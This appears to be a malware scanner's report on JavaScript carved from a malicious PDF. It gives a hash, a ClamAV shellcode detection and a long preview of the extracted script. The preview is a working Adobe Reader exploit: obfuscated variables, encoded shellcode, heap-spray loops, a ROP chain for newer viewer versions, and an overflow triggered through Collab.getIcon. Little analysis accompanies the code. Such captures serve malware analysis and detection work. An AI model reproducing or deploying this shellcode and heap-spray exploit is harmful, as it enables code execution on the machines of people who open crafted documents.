fb05%u70c7%ufb07%u71c7%udb07%u70c7%u616d%ud870%u7093%u47fa%ud870%ue59f%u028f%u370a%u7071%udf70%ud870%u70af%uabd8%uca06%u065f%u0649%u0e48%u7046%u7070%ube70%u7d4f%u7821%uc65e" +
"%uc206%u0243%u3732%u7071%u0770%u808b%u05c6%u818b%uadb3%u90fa%u05c6%u818b%uadb3%u88fb%ucb07%u8e80%u64c6%u8e7d%u0e40%u8d48%u8f8f%u068f%u4ff2%u9c66%u8f8f%u058f%u818b%uafb3%u89fb%u8b07%uc680%u7c64%u408e%u06c8%u4ff2%ufa70%ue57f%u04cf%u73da%udd70%u0683%u5bca%u4806%ufa04%u8c67%u6ffa%u518e%u490e%u9d93%u8f8f%uc204%u7c6b%u042b%u73f2%u8fe5%ufa70%u704f%u97d8%uca06%ub24b%u7070%u7070%ud4fb%u06d8%u704c%u7ffa%ufa70%udf5b%ud870%udc93%ud870%u049f%u4ff2%u460e%u7070%u7070%u4fbe%u217d%u5e78%u40a6%u7106%u3202%u7237%u7070%u8848%ue2ec%ua1eb%uc848%uea8b%ueaf7%u48af%u87c8%ueca0%uadaf%u480e%u8f83%u8f8f%u2b7c%u49c0%uad88%u49c8%u8f88%ue5d0%u028f%u370a%u7072%udf70%ud870%u70af%ua7d8%u8fe5%u70df%ua3d8%udadc%ud8d9%ue304%u97ab%uca04%u04b3%u8adb%u8ef7%u0465%u97c5%ud504%u8eaf%u6c64%uc6bd%ubb04%u8e04%ube61%u7370%u4fbe%ub723%ufb6f%u4e88%u8240%u488e%u7d64%uf3b4%u9bab%u6efa%ud504%u8eab%ue964%u8304%u04c4%u93d5%u648e%u8b04%u8e04%u6467%ube8d%u064f%ud065%ud2d1%u4dd4%u8f87");
var XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV = LbWxSqgNmAwjUaoXaywhlH("%u0C0C%u0C0C");
while (XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV["l\x65\x6e\x67\x74\x68"] +28 < 65536) 
XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV+=XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV;
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo = XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, (3084-36)/2);
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo += TCfIpiOxOYTTeNgDQsDQaDtVjQ;
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo += XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV;
KoHQQkRIckZJKtdlKTGyUUS = KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, 65536/2);
while(KoHQQkRIckZJKtdlKTGyUUS["l\x65\x6e\x67\x74\x68"] < 524288) KoHQQkRIckZJKtdlKTGyUUS += KoHQQkRIckZJKtdlKTGyUUS;
bdfzsvuobNyDZnrqvFjkFWMnGaDbvlYCKTfwjiCwLEXKoTngADhROnZManDz = KoHQQkRIckZJKtdlKTGyUUS["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, 524288-4120/2)   //ashlfajl;afj
var JkNUxvkKFXvIXewntXRjnLOytMONPyrcUEpPSGrzHuBijVDY = new Array()//ip[wo][]
for(tYzswEF=0;tYzswEF<496;tYzswEF++) JkNUxvkKFXvIXewntXRjnLOytMONPyrcUEpPSGrzHuBijVDY[tYzswEF]=bdfzsvuobNyDZnrqvFjkFWMnGaDbvlYCKTfwjiCwLEXKoTngADhROnZManDz+"s";
//shklfh
//ahf;lajf;
}
else
{
exp8();

}
js_property_alias_stage_000.js deobfuscated-js JavaScript property alias normalized stage at offset 0x13F7D 9711 bytes
SHA-256: 6dfdddbb867525626b7911f24fca8f65b2c5e38853e855a8d3b194b0851b2b82
Detection
ClamAV: Js.Exploit.Shellcode-18
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var sc
for(i=0;i<18000;i++)
sc=sc+0x60
var unes=unescape
var strTempA="byteToChar";
var strTempB="getIcon";
var strTempC="collectEmailInfo";

function rep(count,what){
          var v = "";
          while (--count >= 0) v += what;
          return v;
}
function myunes(buf) {
          var ret =""
          for (var x=0;x < buf["length"]; x+=2) {
                  ret = ret+util[strTempA](Number('0x'+buf["substr"](x,2)));//
          }
          return ret;
}
sc1=unes("%u0C0c%u11eb%u5bfc%u334b%u66c9%u2eb9%u8003" +
"%u0b34%ue28f%uebfa%ue805%uffeb%uffff%ubf67%u8f8f" +
"%u228f%uf214%u2350%u5587%u99f9%u75ea%u639f%u8c18" +
"%u7483%u7218%ubc80%u0545%u65d4%u05c6%u5667%uac05" +
"%u1766%u0571%uff81%u60fc%u69b9%u0098%u0cf4%u3a36" +
"%ud4f7%u06da%u0e6a%uc763%u8f8d%u068f%u73d2%ubfe5" +
"%uebd6%u8e04%ucf04%u0483%u93ff%u0422%u87d7%u83e5" +
"%u04d6%u73f2%udcde%ufb70%u7300%ufc67%u8f8d%ud68f" +
"%ucb06%u7300%u616d%u8ee5%u02d1%u7bca%ud9df%u8804" +
"%u5f70%uca06%ub27f%u7070%u7070%u8bfa%ud9c9%u6764" +
"%u8fb2%u8faf%uf88f%uc98b%u64d9%ue552%ue58f%ue78f" +
"%u9d8f%u8f8f%u04d9%u8bc8%u5f70%u8fe5%uca02%udf63" +
"%u87e5%uca02%udf37%u04d9%u87c8%u5f70%u4f0a%u8bfa" +
"%ud9c9%u3b64%uf20e%udf37%udfeb%ufbcb%uc98b%u64d9" +
"%u0e28%u33f2%u7160%u2165%u8bfb%ud9c9%u1564%ufa70" +
"%ue57f%u70cf%u83d8%uca06%u0a57%ufa4f%u668a%u8e68" )
;

sc2=unes("%u8f8f%u8fe5%u8fe5%u8fe5%u70d9%u8bd8%u8fe5%uca02" +
"%udf63%ufa70%u707f%u57fa%u70d9%u87d8%u4f0a%u8afa" +
"%u4b66%u8f8e%ud98f%ud870%u049f%u57d2%u0c04%u9d9f" +
"%u8f8f%uca06%u0467%u9b0c%u8f9d%u068f%u6bca%u0c04" +
"%u9d97%u8f8f%uca06%u8c6f%u6bca%uca8c%u0667%u53ca" +
"%u05c7%u8c1b%u9d93%u8f8f%u4dbf%u1b07%u938c%u8f9d" +
"%u0a8f%uf84f%u0264%u370a%u7071%udf70%u77e7%u8f8f" +
"%u708f%u9bd8%u3402%u9d93%u8f8f%u460e%u7070%u7070" +
"%u4fbe%u217d%u5e78%u40a6%u7106%u4506%u3202%u7137" +
"%u7070%u460e%u7070%u7070%u217d%u06c0%u7c5e%ue52b" +
"%u028d%u370a%u7071%udf70%uf204%u7073%u97d8%u70b2" +
"%u7070%ufa70%u668a%u8ea0%u8f8f%uca06%u0647%u704d" +
"%u67fa%u0c02%u9d93%u8f8f%uca8c%udf6f%u36dd%u8e8f" 
)
sc3=unes("%u8f8f%udb05%u71c7%ufb05%u70c7%ufb07%u71c7%udb07" +
"%u70c7%u616d%ud870%u7093%u47fa%ud870%ue59f%u028f" +
"%u370a%u7071%udf70%ud870%u70af%uabd8%uca06%u065f" +
"%u0649%u0e48%u7046%u7070%ube70%u7d4f%u7821%uc65e" +
"%uc206%u0243%u3732%u7071%u0770%u808b%u05c6%u818b" +
"%uadb3%u90fa%u05c6%u818b%uadb3%u88fb%ucb07%u8e80" +
"%u64c6%u8e7d%u0e40%u8d48%u8f8f%u068f%u4ff2%u9c66" +
"%u8f8f%u058f%u818b%uafb3%u89fb%u8b07%uc680%u7c64" +
"%u408e%u06c8%u4ff2%ufa70%ue57f%u04cf%u73da%udd70" +
"%u0683%u5bca%u4806%ufa04%u8c67%u6ffa%u518e%u490e" +
"%u9d93%u8f8f%uc204%u7c6b%u042b%u73f2%u8fe5%ufa70" +
"%u704f%u97d8%uca06%ub24b%u7070%u7070%ud4fb%u06d8" +
"%u704c%u7ffa%ufa70%udf5b%ud870%udc93%ud870%u049f" 
)
sc4=unes("%u4ff2%u460e%u7070%u7070%u4fbe%u217d%u5e78%u40a6" +
"%u7106%u3202%u7237%u7070%u8848%ue2ec%ua1eb%uc848" +
"%uea8b%ueaf7%u48af%u87c8%ueca0%uadaf%u480e%u8f83" +
"%u8f8f%u2b7c%u49c0%uad88%u49c8%u8f88%ue5d0%u028f" +
"%u370a%u7072%udf70%ud870%u70af%ua7d8%u8fe5%u70df" +
"%ua3d8%udadc%ud8d9%ue304%u97ab%uca04%u04b3%u8adb" +
"%u8ef7%u0465%u97c5%ud504%u8eaf%u6c64%uc6bd%ubb04" +
"%u8e04%ube61%u7370%u4fbe%ub723%ufb6f%u4e88%u8240" +
"%u488e%u7d64%uf3b4%u9bab%u6efa%ud504%u8eab%ue964" +
"%u8304%u04c4%u93d5%u648e%u8b04%u8e04%u6467%ube8d" +
"%u064f%ud065%ud2d1%u4dd4%u8f87");
////////////agjpg;./.gw]\qwgkq
sc=""+sc1+""+sc2+""+sc3+sc4;

function exp8() {
blah = rep(128, unes("%u4242%u4242%u4242%u4242%u4242")) + sc;
bbk = unes("%u4242%u4242");
var h="getIcon";
wap = 0x24+blah["length"]
while (bbk["length"]<wap) bbk+=bbk;
fillbk = bbk["substring"](0, wap);
bk = bbk["substring"](0, bbk["length"]-wap);
while(bk["length"]+wap<262144) bk = bk+bk+fillbk;
mm = new Array()//jf;afkla'[
for (i=0;i<350;i++) mm[i] = bk + blah;
of = rep(4096, myunes("0a0a0a0a"));
var a=["_N.bundle"];//next time
var b=5;//shlshgl
Collab.getIcon(of+a[b-b])//ajf[pa';[
}

if(app.viewerVersion>=9.00)
{
var LbWxSqgNmAwjUaoXaywhlH =	  unescape	
var TCfIpiOxOYTTeNgDQsDQaDtVjQ;
for(i=0;i<18000;i++)
TCfIpiOxOYTTeNgDQsDQaDtVjQ = TCfIpiOxOYTTeNgDQsDQaDtVjQ+0x70;

var TCfIpiOxOYTTeNgDQsDQaDtVjQ = LbWxSqgNmAwjUaoXaywhlH("%u0C0C%u0C0C%u4919%u0700%u12bb%u0700%u1022%u0700%u0C0C%u0C0C" +
"%u0C0C%u0C0C%u1599%u0700%u0124%u0001%u72f7%u0700" +
"%u0104%u0001%u15bb%u0700%u1000%u0000%u154d%u0700" +
"%u15bb%u0700%u0300%u7ffe%u7fb2%u0700%u15bb%u0700" +
"%u0011%u0001%ua8ac%u0700%u15bb%u0700%u0100%u0001" +
"%ua8ac%u0700%u72f7%u0700%u0011%u0001%u52e2%u0700" +
"%u5c54%u0700%uffff%uffff%u0100%u0001%u0000%u0000" +
"%u0104%u0001%u1000%u0000%u0040%u0000"+
"%ud731%u0700%u15bb%u0700%u905a%u9054%u154d%u0700%ua722"+
"%u0700%u15bb%u0700%ueb5a%u5815%u154d%u0700%ua722%u0700%u15bb%u0700%u1a8b%u1889%u154d%u0700%ua722%u0700"+
"%u15bb%u0700%uc083%u8304%u154d%u0700%ua722%u0700%u15bb%u0700%u04c2%ufb81%u154d%u0700%ua722%u0700%u15bb"+
"%u0700%u0C0C%u0C0C%u154d%u0700%ua722%u0700%u15bb%u0700%uee75%u05eb%u154d%u0700%ua722%u0700%u15bb%u0700"+
"%ue6e8%uffff%u154d%u0700%ua722%u0700%u15bb%u0700%u90ff%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%u9090"+
"%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%u9090%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%uffff%u90ff"+
"%u154d%u0700%ud731%u0700%u112f%u0700"+
"%u3030%u3030%u0C0c%u11eb%u5bfc%u334b%u66c9%u2eb9%u8003" +
"%u0b34%ue28f%uebfa%ue805%uffeb%uffff%ubf67%u8f8f" +
"%u228f%uf214%u2350%u5587%u99f9%u75ea%u639f%u8c18" +
"%u7483%u7218%ubc80%u0545%u65d4%u05c6%u5667%uac05" +
"%u1766%u0571%uff81%u60fc%u69b9%u0098%u0cf4%u3a36" +
"%ud4f7%u06da%u0e6a%uc763%u8f8d%u068f%u73d2%ubfe5" +
"%uebd6%u8e04%ucf04%u0483%u93ff%u0422%u87d7%u83e5" +
"%u04d6%u73f2%udcde%ufb70%u7300%ufc67%u8f8d%ud68f" +
"%ucb06%u7300%u616d%u8ee5%u02d1%u7bca%ud9df%u8804" +
"%u5f70%uca06%ub27f%u7070%u7070%u8bfa%ud9c9%u6764" +
"%u8fb2%u8faf%uf88f%uc98b%u64d9%ue552%ue58f%ue78f" +
"%u9d8f%u8f8f%u04d9%u8bc8%u5f70%u8fe5%uca02%udf63" +
"%u87e5%uca02%udf37%u04d9%u87c8%u5f70%u4f0a%u8bfa" +
"%ud9c9%u3b64%uf20e%udf37%udfeb%ufbcb%uc98b%u64d9" +
"%u0e28%u33f2%u7160%u2165%u8bfb%ud9c9%u1564%ufa70" +
"%ue57f%u70cf%u83d8%uca06%u0a57%ufa4f%u668a%u8e68" +
"%u8f8f%u8fe5%u8fe5%u8fe5%u70d9%u8bd8%u8fe5%uca02" +
"%udf63%ufa70%u707f%u57fa%u70d9%u87d8%u4f0a%u8afa" +
"%u4b66%u8f8e%ud98f%ud870%u049f%u57d2%u0c04%u9d9f" +
"%u8f8f%uca06%u0467%u9b0c%u8f9d%u068f%u6bca%u0c04" +
"%u9d97%u8f8f%uca06%u8c6f%u6bca%uca8c%u0667%u53ca" +
"%u05c7%u8c1b%u9d93%u8f8f%u4dbf%u1b07%u938c%u8f9d" +
"%u0a8f%uf84f%u0264%u370a%u7071%udf70%u77e7%u8f8f" +
"%u708f%u9bd8%u3402%u9d93%u8f8f%u460e%u7070%u7070" +
"%u4fbe%u217d%u5e78%u40a6%u7106%u4506%u3202%u7137" +
"%u7070%u460e%u7070%u7070%u217d%u06c0%u7c5e%ue52b" +
"%u028d%u370a%u7071%udf70%uf204%u7073%u97d8%u70b2" +
"%u7070%ufa70%u668a%u8ea0%u8f8f%uca06%u0647%u704d" +
"%u67fa%u0c02%u9d93%u8f8f%uca8c%udf6f%u36dd%u8e8f" +
"%u8f8f%udb05%u71c7%ufb05%u70c7%ufb07%u71c7%udb07" +
"%u70c7%u616d%ud870%u7093%u47fa%ud870%ue59f%u028f" +
"%u370a%u7071%udf70%ud870%u70af%uabd8%uca06%u065f" +
"%u0649%u0e48%u7046%u7070%ube70%u7d4f%u7821%uc65e" +
"%uc206%u0243%u3732%u7071%u0770%u808b%u05c6%u818b" +
"%uadb3%u90fa%u05c6%u818b%uadb3%u88fb%ucb07%u8e80" +
"%u64c6%u8e7d%u0e40%u8d48%u8f8f%u068f%u4ff2%u9c66" +
"%u8f8f%u058f%u818b%uafb3%u89fb%u8b07%uc680%u7c64" +
"%u408e%u06c8%u4ff2%ufa70%ue57f%u04cf%u73da%udd70" +
"%u0683%u5bca%u4806%ufa04%u8c67%u6ffa%u518e%u490e" +
"%u9d93%u8f8f%uc204%u7c6b%u042b%u73f2%u8fe5%ufa70" +
"%u704f%u97d8%uca06%ub24b%u7070%u7070%ud4fb%u06d8" +
"%u704c%u7ffa%ufa70%udf5b%ud870%udc93%ud870%u049f" +
"%u4ff2%u460e%u7070%u7070%u4fbe%u217d%u5e78%u40a6" +
"%u7106%u3202%u7237%u7070%u8848%ue2ec%ua1eb%uc848" +
"%uea8b%ueaf7%u48af%u87c8%ueca0%uadaf%u480e%u8f83" +
"%u8f8f%u2b7c%u49c0%uad88%u49c8%u8f88%ue5d0%u028f" +
"%u370a%u7072%udf70%ud870%u70af%ua7d8%u8fe5%u70df" +
"%ua3d8%udadc%ud8d9%ue304%u97ab%uca04%u04b3%u8adb" +
"%u8ef7%u0465%u97c5%ud504%u8eaf%u6c64%uc6bd%ubb04" +
"%u8e04%ube61%u7370%u4fbe%ub723%ufb6f%u4e88%u8240" +
"%u488e%u7d64%uf3b4%u9bab%u6efa%ud504%u8eab%ue964" +
"%u8304%u04c4%u93d5%u648e%u8b04%u8e04%u6467%ube8d" +
"%u064f%ud065%ud2d1%u4dd4%u8f87");
var XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV = LbWxSqgNmAwjUaoXaywhlH("%"+ "u" + "0" + "C" + "0" + "C" + "%u" + "0" + "C" + "0" + "C");
while (XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV["length"] +28 < 65536) 
XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV+=XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV;
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo = XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV["substring"](0, (3084-36)/2);
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo += TCfIpiOxOYTTeNgDQsDQaDtVjQ;
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo += XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV;
KoHQQkRIckZJKtdlKTGyUUS = KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo["substring"](0, 65536/2);
while(KoHQQkRIckZJKtdlKTGyUUS["length"] < 524288) KoHQQkRIckZJKtdlKTGyUUS += KoHQQkRIckZJKtdlKTGyUUS;
bdfzsvuobNyDZnrqvFjkFWMnGaDbvlYCKTfwjiCwLEXKoTngADhROnZManDz = KoHQQkRIckZJKtdlKTGyUUS["substring"](0, 524288-4120/2)   //ashlfajl;afj
var JkNUxvkKFXvIXewntXRjnLOytMONPyrcUEpPSGrzHuBijVDY = new Array()//ip[wo][]
for(tYzswEF=0;tYzswEF<496;tYzswEF++) JkNUxvkKFXvIXewntXRjnLOytMONPyrcUEpPSGrzHuBijVDY[tYzswEF]=bdfzsvuobNyDZnrqvFjkFWMnGaDbvlYCKTfwjiCwLEXKoTngADhROnZManDz+"s";
//shklfh
//ahf;lajf;
}
else
{
exp8();

}

/* static-property-alias-sinks */
unescape('%u9090%u9090');Collab.getIcon(